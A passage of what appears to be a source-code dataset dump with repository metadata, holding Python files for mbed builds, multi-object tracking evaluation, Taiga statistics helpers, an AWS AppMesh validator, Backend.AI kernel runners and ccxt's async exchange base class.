logging.warning("No 'mbed-os.lib' found in '%s'" % name)
if os.path.exists("mbed-os"):
logging.warning("'mbed-os' already existed in '%s'" % name)
else:
logging.info("Creating Symbolic link '%s'->'mbed-os'" % path)
os.symlink(path, "mbed-os")
#Cmake tool currently require 'mbed-os.lib' to be present to perform build.
#Add a empty 'mbed-os.lib' as a workaround
open('mbed-os.lib', 'a').close()
os.chdir(CWD)
return 0
def fetch_output_image(output,cmake):
lines = output.splitlines()
last_index = -31 if len(lines)>29 else (-1 - len(lines))
for index in range(-1,last_index,-1):
if cmake:
if lines[index].startswith("-- built:") and lines[index].endswith(".bin"):
image = lines[index][10:]
print("IMAGE is " + image)
if os.path.isfile(image):
return os.path.relpath(image)
else:
if lines[index].startswith("Image:"):
image = lines[index][7:]
if os.path.isfile(image):
return image
return False
| true | true |
f72eb9f4639cbc1da62b470e79d10c5da4bfa8a1 | 9,904 | py | Python | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | import os
import os.path as osp
import cv2
import logging
import argparse
import motmetrics as mm
import torch
from tracker.multitracker import JDETracker
from utils import visualization as vis
from utils.log import logger
from utils.timer import Timer
from utils.evaluation import Evaluator
from utils.parse_config import parse_model_cfg
import utils.datasets as datasets
from utils.utils import *
def write_results(filename, results, data_type):
if data_type == 'mot':
save_format = '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n'
elif data_type == 'kitti':
save_format = '{frame} {id} pedestrian 0 0 -10 {x1} {y1} {x2} {y2} -10 -10 -10 -1000 -1000 -1000 -10\n'
else:
raise ValueError(data_type)
with open(filename, 'w') as f:
for frame_id, tlwhs, track_ids in results:
if data_type == 'kitti':
frame_id -= 1
for tlwh, track_id in zip(tlwhs, track_ids):
if track_id < 0:
continue
x1, y1, w, h = tlwh
x2, y2 = x1 + w, y1 + h
line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h)
f.write(line)
logger.info('save results to {}'.format(filename))
def conversion_frame_init(opt,frame_rate):
global tracker,timer,results,frame_id,objopt,resultscamera
objopt = opt
tracker = JDETracker(opt, frame_rate=frame_rate)
timer = Timer()
results = []
resultscamera = [None] * 1000
frame_id = 0
def conversion_frame(img, img0):
global tracker,timer,resultscamera,frame_id,objopt
# run tracking
timer.tic()
blob = torch.from_numpy(img).cuda().unsqueeze(0)
online_targets = tracker.update(blob, img0)
online_tlwhs = []
online_ids = []
for t in online_targets:
tlwh = t.tlwh
tid = t.track_id
vertical = tlwh[2] / tlwh[3] > 1.6
if tlwh[2] * tlwh[3] > objopt.min_box_area and not vertical:
online_tlwhs.append(tlwh)
online_ids.append(tid)
timer.toc()
count = frame_id%1000
resultscamera[count] = (frame_id + 1, online_tlwhs, online_ids)
online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
fps=1. / timer.average_time)
frame_id += 1
return online_im,resultscamera[count]
def eval_seq(opt, dataloader, data_type, result_filename, save_dir=None, show_image=True, frame_rate=30):
'''
Processes the video sequence given and provides the output of tracking result (write the results in video file)
It uses JDE model for getting information about the online targets present.
Parameters
----------
opt : Namespace
Contains information passed as commandline arguments.
dataloader : LoadVideo
Instance of LoadVideo class used for fetching the image sequence and associated data.
data_type : String
Type of dataset corresponding(similar) to the given video.
result_filename : String
The name(path) of the file for storing results.
save_dir : String
Path to the folder for storing the frames containing bounding box information (Result frames).
show_image : bool
Option for shhowing individial frames during run-time.
frame_rate : int
Frame-rate of the given video.
Returns
-------
(Returns are not significant here)
frame_id : int
Sequence number of the last sequence
'''
if save_dir:
mkdir_if_missing(save_dir)
tracker = JDETracker(opt, frame_rate=frame_rate)
timer = Timer()
results = []
frame_id = 0
for path, img, img0 in dataloader:
if frame_id % 20 == 0:
logger.info('Processing frame {} ({:.2f} fps)'.format(frame_id, 1./max(1e-5, timer.average_time)))
# run tracking
timer.tic()
blob = torch.from_numpy(img).cuda().unsqueeze(0)
online_targets = tracker.update(blob, img0)
online_tlwhs = []
online_ids = []
for t in online_targets:
tlwh = t.tlwh
tid = t.track_id
vertical = tlwh[2] / tlwh[3] > 1.6
if tlwh[2] * tlwh[3] > opt.min_box_area and not vertical:
online_tlwhs.append(tlwh)
online_ids.append(tid)
timer.toc()
# save results
results.append((frame_id + 1, online_tlwhs, online_ids))
if show_image or save_dir is not None:
online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
fps=1. / timer.average_time)
if show_image:
cv2.imshow('online_im', online_im)
if save_dir is not None:
cv2.imwrite(os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), online_im)
frame_id += 1
# save results
write_results(result_filename, results, data_type)
return frame_id, timer.average_time, timer.calls
def main(opt, data_root='/data/MOT16/train', det_root=None, seqs=('MOT16-05',), exp_name='demo',
save_images=False, save_videos=False, show_image=True):
logger.setLevel(logging.INFO)
result_root = os.path.join(data_root, '..', 'results', exp_name)
mkdir_if_missing(result_root)
data_type = 'mot'
# Read config
cfg_dict = parse_model_cfg(opt.cfg)
opt.img_size = [int(cfg_dict[0]['width']), int(cfg_dict[0]['height'])]
# run tracking
accs = []
n_frame = 0
timer_avgs, timer_calls = [], []
for seq in seqs:
output_dir = os.path.join(data_root, '..','outputs', exp_name, seq) if save_images or save_videos else None
logger.info('start seq: {}'.format(seq))
dataloader = datasets.LoadImages(osp.join(data_root, seq, 'img1'), opt.img_size)
result_filename = os.path.join(result_root, '{}.txt'.format(seq))
meta_info = open(os.path.join(data_root, seq, 'seqinfo.ini')).read()
frame_rate = int(meta_info[meta_info.find('frameRate')+10:meta_info.find('\nseqLength')])
nf, ta, tc = eval_seq(opt, dataloader, data_type, result_filename,
save_dir=output_dir, show_image=show_image, frame_rate=frame_rate)
n_frame += nf
timer_avgs.append(ta)
timer_calls.append(tc)
# eval
logger.info('Evaluate seq: {}'.format(seq))
evaluator = Evaluator(data_root, seq, data_type)
accs.append(evaluator.eval_file(result_filename))
if save_videos:
output_video_path = osp.join(output_dir, '{}.mp4'.format(seq))
cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg -c:v copy {}'.format(output_dir, output_video_path)
os.system(cmd_str)
timer_avgs = np.asarray(timer_avgs)
timer_calls = np.asarray(timer_calls)
all_time = np.dot(timer_avgs, timer_calls)
avg_time = all_time / np.sum(timer_calls)
logger.info('Time elapsed: {:.2f} seconds, FPS: {:.2f}'.format(all_time, 1.0 / avg_time))
# get summary
metrics = mm.metrics.motchallenge_metrics
mh = mm.metrics.create()
summary = Evaluator.get_summary(accs, seqs, metrics)
strsummary = mm.io.render_summary(
summary,
formatters=mh.formatters,
namemap=mm.io.motchallenge_metric_names
)
print(strsummary)
Evaluator.save_summary(summary, os.path.join(result_root, 'summary_{}.xlsx'.format(exp_name)))
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='track.py')
parser.add_argument('--cfg', type=str, default='cfg/yolov3.cfg', help='cfg file path')
parser.add_argument('--weights', type=str, default='weights/latest.pt', help='path to weights file')
parser.add_argument('--iou-thres', type=float, default=0.5, help='iou threshold required to qualify as detected')
parser.add_argument('--conf-thres', type=float, default=0.5, help='object confidence threshold')
parser.add_argument('--nms-thres', type=float, default=0.4, help='iou threshold for non-maximum suppression')
parser.add_argument('--min-box-area', type=float, default=200, help='filter out tiny boxes')
parser.add_argument('--track-buffer', type=int, default=30, help='tracking buffer')
parser.add_argument('--test-mot16', action='store_true', help='tracking buffer')
parser.add_argument('--save-images', action='store_true', help='save tracking results (image)')
parser.add_argument('--save-videos', action='store_true', help='save tracking results (video)')
opt = parser.parse_args()
print(opt, end='\n\n')
if not opt.test_mot16:
seqs_str = '''MOT17-02-SDP
MOT17-04-SDP
MOT17-05-SDP
MOT17-09-SDP
MOT17-10-SDP
MOT17-11-SDP
MOT17-13-SDP
'''
data_root = '/home/wangzd/datasets/MOT/MOT17/images/train'
else:
seqs_str = '''MOT16-01
MOT16-03
MOT16-06
MOT16-07
MOT16-08
MOT16-12
MOT16-14'''
data_root = '/home/wangzd/datasets/MOT/MOT16/images/test'
seqs = [seq.strip() for seq in seqs_str.split()]
main(opt,
data_root=data_root,
seqs=seqs,
exp_name=opt.weights.split('/')[-2],
show_image=False,
save_images=opt.save_images,
save_videos=opt.save_videos)
| 39.935484 | 119 | 0.601373 | import os
import os.path as osp
import cv2
import logging
import argparse
import motmetrics as mm
import torch
from tracker.multitracker import JDETracker
from utils import visualization as vis
from utils.log import logger
from utils.timer import Timer
from utils.evaluation import Evaluator
from utils.parse_config import parse_model_cfg
import utils.datasets as datasets
from utils.utils import *
def write_results(filename, results, data_type):
if data_type == 'mot':
save_format = '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n'
elif data_type == 'kitti':
save_format = '{frame} {id} pedestrian 0 0 -10 {x1} {y1} {x2} {y2} -10 -10 -10 -1000 -1000 -1000 -10\n'
else:
raise ValueError(data_type)
with open(filename, 'w') as f:
for frame_id, tlwhs, track_ids in results:
if data_type == 'kitti':
frame_id -= 1
for tlwh, track_id in zip(tlwhs, track_ids):
if track_id < 0:
continue
x1, y1, w, h = tlwh
x2, y2 = x1 + w, y1 + h
line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h)
f.write(line)
logger.info('save results to {}'.format(filename))
def conversion_frame_init(opt,frame_rate):
global tracker,timer,results,frame_id,objopt,resultscamera
objopt = opt
tracker = JDETracker(opt, frame_rate=frame_rate)
timer = Timer()
results = []
resultscamera = [None] * 1000
frame_id = 0
def conversion_frame(img, img0):
global tracker,timer,resultscamera,frame_id,objopt
timer.tic()
blob = torch.from_numpy(img).cuda().unsqueeze(0)
online_targets = tracker.update(blob, img0)
online_tlwhs = []
online_ids = []
for t in online_targets:
tlwh = t.tlwh
tid = t.track_id
vertical = tlwh[2] / tlwh[3] > 1.6
if tlwh[2] * tlwh[3] > objopt.min_box_area and not vertical:
online_tlwhs.append(tlwh)
online_ids.append(tid)
timer.toc()
count = frame_id%1000
resultscamera[count] = (frame_id + 1, online_tlwhs, online_ids)
online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
fps=1. / timer.average_time)
frame_id += 1
return online_im,resultscamera[count]
def eval_seq(opt, dataloader, data_type, result_filename, save_dir=None, show_image=True, frame_rate=30):
if save_dir:
mkdir_if_missing(save_dir)
tracker = JDETracker(opt, frame_rate=frame_rate)
timer = Timer()
results = []
frame_id = 0
for path, img, img0 in dataloader:
if frame_id % 20 == 0:
logger.info('Processing frame {} ({:.2f} fps)'.format(frame_id, 1./max(1e-5, timer.average_time)))
timer.tic()
blob = torch.from_numpy(img).cuda().unsqueeze(0)
online_targets = tracker.update(blob, img0)
online_tlwhs = []
online_ids = []
for t in online_targets:
tlwh = t.tlwh
tid = t.track_id
vertical = tlwh[2] / tlwh[3] > 1.6
if tlwh[2] * tlwh[3] > opt.min_box_area and not vertical:
online_tlwhs.append(tlwh)
online_ids.append(tid)
timer.toc()
results.append((frame_id + 1, online_tlwhs, online_ids))
if show_image or save_dir is not None:
online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
fps=1. / timer.average_time)
if show_image:
cv2.imshow('online_im', online_im)
if save_dir is not None:
cv2.imwrite(os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), online_im)
frame_id += 1
write_results(result_filename, results, data_type)
return frame_id, timer.average_time, timer.calls
def main(opt, data_root='/data/MOT16/train', det_root=None, seqs=('MOT16-05',), exp_name='demo',
save_images=False, save_videos=False, show_image=True):
logger.setLevel(logging.INFO)
result_root = os.path.join(data_root, '..', 'results', exp_name)
mkdir_if_missing(result_root)
data_type = 'mot'
cfg_dict = parse_model_cfg(opt.cfg)
opt.img_size = [int(cfg_dict[0]['width']), int(cfg_dict[0]['height'])]
accs = []
n_frame = 0
timer_avgs, timer_calls = [], []
for seq in seqs:
output_dir = os.path.join(data_root, '..','outputs', exp_name, seq) if save_images or save_videos else None
logger.info('start seq: {}'.format(seq))
dataloader = datasets.LoadImages(osp.join(data_root, seq, 'img1'), opt.img_size)
result_filename = os.path.join(result_root, '{}.txt'.format(seq))
meta_info = open(os.path.join(data_root, seq, 'seqinfo.ini')).read()
frame_rate = int(meta_info[meta_info.find('frameRate')+10:meta_info.find('\nseqLength')])
nf, ta, tc = eval_seq(opt, dataloader, data_type, result_filename,
save_dir=output_dir, show_image=show_image, frame_rate=frame_rate)
n_frame += nf
timer_avgs.append(ta)
timer_calls.append(tc)
logger.info('Evaluate seq: {}'.format(seq))
evaluator = Evaluator(data_root, seq, data_type)
accs.append(evaluator.eval_file(result_filename))
if save_videos:
output_video_path = osp.join(output_dir, '{}.mp4'.format(seq))
cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg -c:v copy {}'.format(output_dir, output_video_path)
os.system(cmd_str)
timer_avgs = np.asarray(timer_avgs)
timer_calls = np.asarray(timer_calls)
all_time = np.dot(timer_avgs, timer_calls)
avg_time = all_time / np.sum(timer_calls)
logger.info('Time elapsed: {:.2f} seconds, FPS: {:.2f}'.format(all_time, 1.0 / avg_time))
metrics = mm.metrics.motchallenge_metrics
mh = mm.metrics.create()
summary = Evaluator.get_summary(accs, seqs, metrics)
strsummary = mm.io.render_summary(
summary,
formatters=mh.formatters,
namemap=mm.io.motchallenge_metric_names
)
print(strsummary)
Evaluator.save_summary(summary, os.path.join(result_root, 'summary_{}.xlsx'.format(exp_name)))
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='track.py')
parser.add_argument('--cfg', type=str, default='cfg/yolov3.cfg', help='cfg file path')
parser.add_argument('--weights', type=str, default='weights/latest.pt', help='path to weights file')
parser.add_argument('--iou-thres', type=float, default=0.5, help='iou threshold required to qualify as detected')
parser.add_argument('--conf-thres', type=float, default=0.5, help='object confidence threshold')
parser.add_argument('--nms-thres', type=float, default=0.4, help='iou threshold for non-maximum suppression')
parser.add_argument('--min-box-area', type=float, default=200, help='filter out tiny boxes')
parser.add_argument('--track-buffer', type=int, default=30, help='tracking buffer')
parser.add_argument('--test-mot16', action='store_true', help='tracking buffer')
parser.add_argument('--save-images', action='store_true', help='save tracking results (image)')
parser.add_argument('--save-videos', action='store_true', help='save tracking results (video)')
opt = parser.parse_args()
print(opt, end='\n\n')
if not opt.test_mot16:
seqs_str = '''MOT17-02-SDP
MOT17-04-SDP
MOT17-05-SDP
MOT17-09-SDP
MOT17-10-SDP
MOT17-11-SDP
MOT17-13-SDP
'''
data_root = '/home/wangzd/datasets/MOT/MOT17/images/train'
else:
seqs_str = '''MOT16-01
MOT16-03
MOT16-06
MOT16-07
MOT16-08
MOT16-12
MOT16-14'''
data_root = '/home/wangzd/datasets/MOT/MOT16/images/test'
seqs = [seq.strip() for seq in seqs_str.split()]
main(opt,
data_root=data_root,
seqs=seqs,
exp_name=opt.weights.split('/')[-2],
show_image=False,
save_images=opt.save_images,
save_videos=opt.save_videos)
| true | true |
f72ebb099171a1bdd6461c9a7537a443a6f2854c | 3,946 | py | Python | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | import datetime as dt
import sys
import matplotlib
import taiga_stats.constants as c
matplotlib.use("TkAgg") # Reference: https://stackoverflow.com/a/48374671/265508
DOT_HEADER_FMT = """digraph {:s} {{
labelloc="t";
//labelfontsize="40"
label="{:s}";
//size="7.5,10"
ratio="compress"
//orientation=landscape
"""
def get_tag_str(tag):
return "" if tag == c.TAG_MATCH_ALL else tag
def get_stories_with_tag(project, tag):
uss = project.list_user_stories()
ret_uss = None
if tag == c.TAG_MATCH_ALL:
ret_uss = uss
else:
ret_uss = []
for us in uss:
if us.tags and tag in us.tags:
ret_uss.append(us)
if ret_uss is None or len(ret_uss) == 0:
print(
"Warning: no userstories matching '{:s}' was found.".format(tag),
file=sys.stderr,
)
sys.exit(1)
return ret_uss
def get_us_stauts_id_from_name(project, name):
statuses = project.list_user_story_statuses()
for status in statuses:
if status.name == name:
return status.id
return None
def get_us_status_name_from_id(project, status_id):
statuses = project.list_user_story_statuses()
for status in statuses:
if status.id == status_id:
return status.name
return None
def remove_closed_stories(_project, uss):
ret_uss = []
for us in uss:
if not us.is_closed:
ret_uss.append(us)
return ret_uss
def get_statuses_sorted_by_order(project):
statuses = project.list_user_story_statuses()
return sorted(statuses, key=lambda status: status.order)
def get_statuses_sorted_by_id(project):
statuses = project.list_user_story_statuses()
return sorted(statuses, key=lambda status: status.id)
def get_status_id_sorted(project):
return [status.id for status in get_statuses_sorted_by_order(project)]
def get_status_and_names_sorted(project):
status_ids = get_status_id_sorted(project)[::-1]
status_names = []
for status_id in status_ids:
status_names.append(get_us_status_name_from_id(project, status_id))
return status_ids, status_names
def get_dot_header(name, title):
return DOT_HEADER_FMT.format(name, title)
def get_dot_footer():
return "}"
def read_daily_cfd(path, tag):
data_file = c.CFD_DATA_FILE_FMT.format(get_tag_str(tag))
data_path = "{:s}/{:s}".format(path, data_file)
data = []
try:
with open(data_path, "r", encoding="utf-8") as fdata:
row = 0
for line in fdata:
line = line.rstrip()
parts = line.split("\t")
if row == 0:
data = [[] for _ in range(len(parts) + 1)]
else:
for col in range(len(parts)):
value = parts[col]
if col == 0: # First col is dates
value = dt.datetime.strptime(value, "%Y-%m-%d")
elif col == 1: # Second col is annotations
pass
else:
value = int(value)
data[col].append(value)
row += 1
except IOError as e:
print(
"Could not read {:s}, error: {:s}".format(data_path, str(e)),
file=sys.stderr,
)
sys.exit(2)
return data
class assert_args:
"""
Assert that the given arguments exists.
"""
def __init__(self, *args):
self.needed_args = args
def __call__(self, func):
dec = self
def wrapper(args):
for arg in dec.needed_args:
if arg not in args or args[arg] is None:
print("Required argument ''{:s}' was not supplied on commandline or set in config file.".format(arg))
return 1
func(args)
return wrapper
| 25.79085 | 121 | 0.582615 | import datetime as dt
import sys
import matplotlib
import taiga_stats.constants as c
matplotlib.use("TkAgg")
DOT_HEADER_FMT = """digraph {:s} {{
labelloc="t";
//labelfontsize="40"
label="{:s}";
//size="7.5,10"
ratio="compress"
//orientation=landscape
"""
def get_tag_str(tag):
return "" if tag == c.TAG_MATCH_ALL else tag
def get_stories_with_tag(project, tag):
uss = project.list_user_stories()
ret_uss = None
if tag == c.TAG_MATCH_ALL:
ret_uss = uss
else:
ret_uss = []
for us in uss:
if us.tags and tag in us.tags:
ret_uss.append(us)
if ret_uss is None or len(ret_uss) == 0:
print(
"Warning: no userstories matching '{:s}' was found.".format(tag),
file=sys.stderr,
)
sys.exit(1)
return ret_uss
def get_us_stauts_id_from_name(project, name):
statuses = project.list_user_story_statuses()
for status in statuses:
if status.name == name:
return status.id
return None
def get_us_status_name_from_id(project, status_id):
statuses = project.list_user_story_statuses()
for status in statuses:
if status.id == status_id:
return status.name
return None
def remove_closed_stories(_project, uss):
ret_uss = []
for us in uss:
if not us.is_closed:
ret_uss.append(us)
return ret_uss
def get_statuses_sorted_by_order(project):
statuses = project.list_user_story_statuses()
return sorted(statuses, key=lambda status: status.order)
def get_statuses_sorted_by_id(project):
statuses = project.list_user_story_statuses()
return sorted(statuses, key=lambda status: status.id)
def get_status_id_sorted(project):
return [status.id for status in get_statuses_sorted_by_order(project)]
def get_status_and_names_sorted(project):
status_ids = get_status_id_sorted(project)[::-1]
status_names = []
for status_id in status_ids:
status_names.append(get_us_status_name_from_id(project, status_id))
return status_ids, status_names
def get_dot_header(name, title):
return DOT_HEADER_FMT.format(name, title)
def get_dot_footer():
return "}"
def read_daily_cfd(path, tag):
data_file = c.CFD_DATA_FILE_FMT.format(get_tag_str(tag))
data_path = "{:s}/{:s}".format(path, data_file)
data = []
try:
with open(data_path, "r", encoding="utf-8") as fdata:
row = 0
for line in fdata:
line = line.rstrip()
parts = line.split("\t")
if row == 0:
data = [[] for _ in range(len(parts) + 1)]
else:
for col in range(len(parts)):
value = parts[col]
if col == 0:
value = dt.datetime.strptime(value, "%Y-%m-%d")
elif col == 1:
pass
else:
value = int(value)
data[col].append(value)
row += 1
except IOError as e:
print(
"Could not read {:s}, error: {:s}".format(data_path, str(e)),
file=sys.stderr,
)
sys.exit(2)
return data
class assert_args:
def __init__(self, *args):
self.needed_args = args
def __call__(self, func):
dec = self
def wrapper(args):
for arg in dec.needed_args:
if arg not in args or args[arg] is None:
print("Required argument ''{:s}' was not supplied on commandline or set in config file.".format(arg))
return 1
func(args)
return wrapper
| true | true |
f72ebbd1000cb065fe77e17ce2acc68b098d41f3 | 522 | py | Python | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2012-2022, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
def validate_listenertls_mode(listenertls_mode):
"""
Validate Mode for ListernerTls
Property: ListenerTls.Mode
"""
VALID_LISTENERTLS_MODE = ("STRICT", "PERMISSIVE", "DISABLED")
if listenertls_mode not in VALID_LISTENERTLS_MODE:
raise ValueError(
"ListernerTls Mode must be one of: %s" % ", ".join(VALID_LISTENERTLS_MODE)
)
return listenertls_mode
| 26.1 | 86 | 0.685824 |
def validate_listenertls_mode(listenertls_mode):
VALID_LISTENERTLS_MODE = ("STRICT", "PERMISSIVE", "DISABLED")
if listenertls_mode not in VALID_LISTENERTLS_MODE:
raise ValueError(
"ListernerTls Mode must be one of: %s" % ", ".join(VALID_LISTENERTLS_MODE)
)
return listenertls_mode
| true | true |
f72ebc3e4aa53fcb0695239a45e7c14928a36718 | 1,159 | py | Python | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | 1 | 2021-10-04T21:59:34.000Z | 2021-10-04T21:59:34.000Z | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | null | null | null | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | null | null | null | import argparse
from .base import BaseRunner
from .terminal import Terminal
__all__ = (
'BaseRunner',
'Terminal',
)
__version__ = '1.4.1'
lang_map = {
'python': 'ai.backend.kernel.python.Runner',
'c': 'ai.backend.kernel.c.Runner',
'cpp': 'ai.backend.kernel.cpp.Runner',
'golang': 'ai.backend.kernel.golang.Runner',
'rust': 'ai.backend.kernel.rust.Runner',
'java': 'ai.backend.kernel.java.Runner',
'haskell': 'ai.backend.kernel.haskell.Runner',
'julia': 'ai.backend.kernel.julia.Runner',
'lua': 'ai.backend.kernel.lua.Runner',
'nodejs': 'ai.backend.kernel.nodejs.Runner',
'octave': 'ai.backend.kernel.octave.Runner',
'php': 'ai.backend.kernel.php.Runner',
'r': 'ai.backend.kernel.r.Runner',
'scheme': 'ai.backend.kernel.scheme.Runner',
'git': 'ai.backend.kernel.git.Runner',
'vendor.aws_polly': 'ai.backend.kernel.vendor.aws_polly.Runner',
}
def parse_args(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('--debug', action='store_true', default=False)
parser.add_argument('lang', type=str, choices=lang_map.keys())
return parser.parse_args(args)
| 29.717949 | 70 | 0.672131 | import argparse
from .base import BaseRunner
from .terminal import Terminal
__all__ = (
'BaseRunner',
'Terminal',
)
__version__ = '1.4.1'
lang_map = {
'python': 'ai.backend.kernel.python.Runner',
'c': 'ai.backend.kernel.c.Runner',
'cpp': 'ai.backend.kernel.cpp.Runner',
'golang': 'ai.backend.kernel.golang.Runner',
'rust': 'ai.backend.kernel.rust.Runner',
'java': 'ai.backend.kernel.java.Runner',
'haskell': 'ai.backend.kernel.haskell.Runner',
'julia': 'ai.backend.kernel.julia.Runner',
'lua': 'ai.backend.kernel.lua.Runner',
'nodejs': 'ai.backend.kernel.nodejs.Runner',
'octave': 'ai.backend.kernel.octave.Runner',
'php': 'ai.backend.kernel.php.Runner',
'r': 'ai.backend.kernel.r.Runner',
'scheme': 'ai.backend.kernel.scheme.Runner',
'git': 'ai.backend.kernel.git.Runner',
'vendor.aws_polly': 'ai.backend.kernel.vendor.aws_polly.Runner',
}
def parse_args(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('--debug', action='store_true', default=False)
parser.add_argument('lang', type=str, choices=lang_map.keys())
return parser.parse_args(args)
| true | true |
f72ebcf7d866cdce598b76811f70a12537e4584c | 8,422 | py | Python | python/ccxt/async/base/exchange.py | skeller88/ccxt | 7200521a005a2ddc23efe7bd003628b8e8b955dd | [
"MIT"
] | null | null | null | python/ccxt/async/base/exchange.py | skeller88/ccxt | 7200521a005a2ddc23efe7bd003628b8e8b955dd | [
"MIT"
] | null | null | null | python/ccxt/async/base/exchange.py | skeller88/ccxt | 7200521a005a2ddc23efe7bd003628b8e8b955dd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
__version__ = '1.13.45'
# -----------------------------------------------------------------------------
import asyncio
import concurrent
import socket
import time
import math
import random
import certifi
import aiohttp
import ssl
import yarl
# -----------------------------------------------------------------------------
from ccxt.async.base.throttle import throttle
# -----------------------------------------------------------------------------
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import RequestTimeout
from ccxt.base.errors import NotSupported
# -----------------------------------------------------------------------------
from ccxt.base.exchange import Exchange as BaseExchange
# -----------------------------------------------------------------------------
__all__ = [
'BaseExchange',
'Exchange',
]
# -----------------------------------------------------------------------------
class Exchange(BaseExchange):
def __init__(self, config={}):
if 'asyncio_loop' in config:
self.asyncio_loop = config['asyncio_loop']
self.asyncio_loop = self.asyncio_loop or asyncio.get_event_loop()
self.own_session = 'session' not in config
if self.own_session:
# Create out SSL context object with our CA cert file
context = ssl.create_default_context(cafile=certifi.where())
# Pass this SSL context to aiohttp and create a TCPConnector
connector = aiohttp.TCPConnector(ssl_context=context, loop=self.asyncio_loop)
self.session = aiohttp.ClientSession(loop=self.asyncio_loop, connector=connector)
super(Exchange, self).__init__(config)
self.init_rest_rate_limiter()
def init_rest_rate_limiter(self):
self.throttle = throttle(self.extend({
'loop': self.asyncio_loop,
}, self.tokenBucket))
def __del__(self):
if self.session is not None:
self.logger.warning(self.id + ' requires to release all resources with an explicit call to the .close() coroutine.')
async def close(self):
if self.session is not None:
if self.own_session:
await self.session.close()
self.session = None
async def wait_for_token(self):
while self.rateLimitTokens <= 1:
# if self.verbose:
# print('Waiting for tokens: Exchange: {0}'.format(self.id))
self.add_new_tokens()
seconds_delays = [0.001, 0.005, 0.022, 0.106, 0.5]
delay = random.choice(seconds_delays)
await asyncio.sleep(delay)
self.rateLimitTokens -= 1
def add_new_tokens(self):
# if self.verbose:
# print('Adding new tokens: Exchange: {0}'.format(self.id))
now = time.monotonic()
time_since_update = now - self.rateLimitUpdateTime
new_tokens = math.floor((0.8 * 1000.0 * time_since_update) / self.rateLimit)
if new_tokens > 1:
self.rateLimitTokens = min(self.rateLimitTokens + new_tokens, self.rateLimitMaxTokens)
self.rateLimitUpdateTime = now
async def fetch2(self, path, api='public', method='GET', params={}, headers=None, body=None):
"""A better wrapper over request for deferred signing"""
if self.enableRateLimit:
await self.throttle()
self.lastRestRequestTimestamp = self.milliseconds()
request = self.sign(path, api, method, params, headers, body)
return await self.fetch(request['url'], request['method'], request['headers'], request['body'])
async def fetch(self, url, method='GET', headers=None, body=None):
"""Perform a HTTP request and return decoded JSON data"""
headers = self.prepare_request_headers(headers)
url = self.proxy + url
if self.verbose:
print("\nRequest:", method, url, headers, body)
self.logger.debug("%s %s, Request: %s %s", method, url, headers, body)
encoded_body = body.encode() if body else None
session_method = getattr(self.session, method.lower())
http_status_code = None
try:
async with session_method(yarl.URL(url, encoded=True),
data=encoded_body,
headers=headers,
timeout=(self.timeout / 1000),
proxy=self.aiohttp_proxy) as response:
http_status_code = response.status
text = await response.text()
self.last_http_response = text
self.last_response_headers = response.headers
self.handle_errors(http_status_code, text, url, method, self.last_response_headers, text)
self.handle_rest_errors(None, http_status_code, text, url, method)
if self.verbose:
print("\nResponse:", method, url, str(http_status_code), str(response.headers), self.last_http_response)
self.logger.debug("%s %s, Response: %s %s %s", method, url, response.status, response.headers, self.last_http_response)
except socket.gaierror as e:
self.raise_error(ExchangeNotAvailable, url, method, e, None)
except concurrent.futures._base.TimeoutError as e:
self.raise_error(RequestTimeout, method, url, e, None)
except aiohttp.client_exceptions.ClientConnectionError as e:
self.raise_error(ExchangeNotAvailable, url, method, e, None)
except aiohttp.client_exceptions.ClientError as e:
self.raise_error(ExchangeError, url, method, e, None)
self.handle_errors(http_status_code, text, url, method, self.last_response_headers, text)
return self.handle_rest_response(text, url, method, headers, body)
async def load_markets(self, reload=False):
if not reload:
